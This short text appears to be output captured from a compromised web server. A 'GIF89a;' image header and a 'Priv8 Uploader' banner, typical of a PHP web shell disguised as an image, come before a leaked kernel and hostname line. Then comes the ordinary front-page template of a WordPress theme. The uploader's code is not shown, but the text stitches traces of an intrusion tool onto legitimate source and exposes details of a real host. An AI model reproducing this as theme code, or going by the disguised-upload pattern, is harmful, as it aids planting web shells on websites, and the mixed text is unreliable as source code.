GIF89a;
Priv8 Uploader By InMyMine7
Linux server.abcbiz.in 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
<?php
/**
* Front Page
*
* @package Digital_Download
*/
$home_sections = digital_download_get_home_sections();
if ( 'posts' == get_option( 'show_on_front' ) ) { //Show Static Blog Page
include( get_home_template() );
}elseif( $home_sections ){
get_header();
//If any one section are enabled then show custom home page.
foreach( $home_sections as $section ){
get_template_part( 'sections/' . esc_attr( $section ) );
}
get_footer();
}else {
//If all section are disabled then show respective page template.
include( get_page_template() );
}